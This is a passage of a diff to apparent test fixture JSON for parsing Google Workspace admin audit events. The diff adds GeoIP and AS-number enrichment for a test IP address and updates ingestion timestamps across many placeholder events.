"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REMOVE_RECOVERY_PHONE", @@ -3185,6 +3725,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3194,7 +3746,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005079300Z", + "ingested": "2021-12-14T14:44:54.651996829Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_ACCOUNT_INFO\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REQUEST_ACCOUNT_INFO", @@ -3256,6 +3808,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3265,7 +3829,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005084800Z", + "ingested": "2021-12-14T14:44:54.651997215Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_EXPORT_INCLUDE_DELETED\",\"value\":\"true\"},{\"name\":\"EMAIL_EXPORT_PACKAGE_CONTENT\",\"value\":\"contents\"},{\"name\":\"SEARCH_QUERY_FOR_DUMP\",\"value\":\"foo bar\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}", "provider": "admin", "action": "REQUEST_MAILBOX_DUMP", @@ -3326,6 +3890,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3335,7 +3911,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005088500Z", + "ingested": "2021-12-14T14:44:54.651997570Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESEND_USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "RESEND_USER_INVITE", @@ -3392,6 +3968,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3401,7 +3989,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005092900Z", + "ingested": "2021-12-14T14:44:54.651997927Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESET_SIGNIN_COOKIES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "RESET_SIGNIN_COOKIES", @@ -3463,6 +4051,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3472,7 +4072,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005096800Z", + "ingested": "2021-12-14T14:44:54.651998283Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SECURITY_KEY_REGISTERED_FOR_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "SECURITY_KEY_REGISTERED_FOR_USER", @@ -3534,6 +4134,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3543,7 +4155,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005100700Z", + "ingested": "2021-12-14T14:44:54.651998784Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_SECURITY_KEY\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REVOKE_SECURITY_KEY", @@ -3604,6 +4216,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3613,7 +4237,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005104600Z", + "ingested": "2021-12-14T14:44:54.651999175Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "USER_INVITE", @@ -3669,6 +4293,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3678,7 +4314,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005107800Z", + "ingested": "2021-12-14T14:44:54.651999529Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"VIEW_TEMP_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "VIEW_TEMP_PASSWORD", @@ -3735,6 +4371,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3744,7 +4392,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005112Z", + "ingested": "2021-12-14T14:44:54.651999883Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TURN_OFF_2_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "TURN_OFF_2_STEP_VERIFICATION", @@ -3806,6 +4454,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3815,7 +4475,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005117600Z", + "ingested": "2021-12-14T14:44:54.652000259Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNBLOCK_USER_SESSION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNBLOCK_USER_SESSION", @@ -3877,6 +4537,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3886,7 +4558,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005123Z", + "ingested": "2021-12-14T14:44:54.652000613Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_TITANIUM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNENROLL_USER_FROM_TITANIUM", @@ -3948,6 +4620,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3957,7 +4641,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005129100Z", + "ingested": "2021-12-14T14:44:54.652000970Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ARCHIVE_USER", @@ -4018,6 +4702,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4027,7 +4723,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005134200Z", + "ingested": "2021-12-14T14:44:54.652001321Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPDATE_BIRTHDATE\",\"parameters\":[{\"name\":\"BIRTHDATE\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPDATE_BIRTHDATE", @@ -4084,6 +4780,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4093,7 +4801,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005139500Z", + "ingested": "2021-12-14T14:44:54.652001684Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CREATE_USER", @@ -4155,6 +4863,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4164,7 +4884,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005143400Z", + "ingested": "2021-12-14T14:44:54.652002044Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "DELETE_USER", @@ -4226,6 +4946,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4235,7 +4967,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005146800Z", + "ingested": "2021-12-14T14:44:54.652002400Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNGRADE_USER_FROM_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "DOWNGRADE_USER_FROM_GPLUS", @@ -4297,6 +5029,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4306,7 +5050,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005150900Z", + "ingested": "2021-12-14T14:44:54.652002756Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_ENROLLED_IN_TWO_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "USER_ENROLLED_IN_TWO_STEP_VERIFICATION", @@ -4362,6 +5106,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4371,7 +5127,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005155900Z", + "ingested": "2021-12-14T14:44:54.652003112Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_USERLIST_CSV\"}}", "provider": "admin", "action": "DOWNLOAD_USERLIST_CSV", @@ -4424,6 +5180,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4433,7 +5201,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005160600Z", + "ingested": "2021-12-14T14:44:54.652003487Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MOVE_USER_TO_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOVE_USER_TO_ORG_UNIT", @@ -4487,6 +5255,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4496,7 +5276,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005166Z", + "ingested": "2021-12-14T14:44:54.652003846Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD", @@ -4550,6 +5330,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4559,7 +5351,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005171400Z", + "ingested": "2021-12-14T14:44:54.652004223Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RENAME_USER\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "RENAME_USER", @@ -4616,6 +5408,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4625,7 +5429,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005176800Z", + "ingested": "2021-12-14T14:44:54.652004589Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_STRONG_AUTH\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNENROLL_USER_FROM_STRONG_AUTH", @@ -4687,6 +5491,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4696,7 +5512,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005182200Z", + "ingested": "2021-12-14T14:44:54.652005009Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "SUSPEND_USER", @@ -4758,6 +5574,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4767,7 +5595,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005187500Z", + "ingested": "2021-12-14T14:44:54.652005367Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNARCHIVE_USER", @@ -4829,6 +5657,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4838,7 +5678,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005192800Z", + "ingested": "2021-12-14T14:44:54.652005742Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNDELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNDELETE_USER", @@ -4900,6 +5740,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4909,7 +5761,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005198200Z", + "ingested": "2021-12-14T14:44:54.652006102Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNSUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNSUSPEND_USER", @@ -4971,6 +5823,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4980,7 +5844,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005203500Z", + "ingested": "2021-12-14T14:44:54.652006461Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPGRADE_USER_TO_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPGRADE_USER_TO_GPLUS", @@ -5041,6 +5905,18 @@ "id": "1" }, "source": { + "geo": { + 